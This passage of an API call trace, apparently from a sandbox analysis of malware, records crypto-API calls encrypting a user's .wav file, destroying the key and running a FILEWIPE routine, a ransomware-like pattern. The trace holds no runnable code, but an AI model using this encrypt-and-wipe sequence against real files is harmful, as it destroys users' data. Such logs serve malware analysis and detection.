0x9c26e8 [0187.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.585] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0187.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0187.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0187.585] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0187.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0187.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0187.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0187.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0187.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0187.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0187.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0187.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0187.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0187.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0187.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0187.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0187.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0187.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0187.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0187.587] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0187.587] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0187.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0187.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0187.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0187.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0187.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0187.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0187.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0187.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0187.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0187.588] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0187.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0187.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0187.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0187.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0187.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0187.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0187.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0187.588] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0187.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0187.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0187.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0187.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0187.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0187.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0187.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0187.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0187.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0187.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0187.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0187.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0187.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.589] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0187.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0187.589] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0187.590] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0187.590] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c28a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0187.590] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.590] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.590] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.590] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.590] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.590] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.590] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.590] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.590] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0187.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0187.590] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.590] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.590] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0187.590] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.590] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0187.591] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.598] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0187.599] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.599] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0187.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0187.599] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0187.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.599] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x1e8f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x1e90) returned 1 [0187.599] CharLowerBuffW (in: lpsz="byte[7825]", cchLength=0xa | out: lpsz="byte[7825]") returned 0xa [0187.599] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.600] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbea018*, pdwDataLen=0x87e820*=0x1e8f, dwBufLen=0x1e90 | out: pbData=0xbea018*, pdwDataLen=0x87e820*=0x1e90) returned 1 [0187.600] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0187.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.600] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.600] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.602] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0187.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.602] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.602] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.602] CryptDestroyKey (hKey=0x90af18) returned 1 [0187.602] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0187.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.602] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.602] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.602] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0187.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.603] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.603] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.603] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.603] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0187.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.603] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.603] CryptReleaseContext (hProv=0x9c0c00, dwFlags=0x0) returned 1 [0187.603] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.603] FreeLibrary (hLibModule=0x74f20000) returned 1 [0187.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0187.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0187.605] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0187.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0187.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.605] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.wav", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x821d4cf0, ftCreationTime.dwHighDateTime=0x1d5db07, ftLastAccessTime.dwLowDateTime=0x981fff30, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x981fff30, ftLastWriteTime.dwHighDateTime=0x1d5e4f2, nFileSizeHigh=0x0, nFileSizeLow=0x1e8f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="V01OknNppjh UAhh.wav", cAlternateFileName="V01OKN~1.WAV")) returned 0x90ae18 [0187.606] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0187.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0187.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0187.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.606] CharLowerBuffW (in: lpsz="byte[7823]", cchLength=0xa | out: lpsz="byte[7823]") returned 0xa [0187.606] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0187.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.606] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0187.606] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0187.607] FreeLibrary (hLibModule=0x75c90000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0187.607] HeapFree 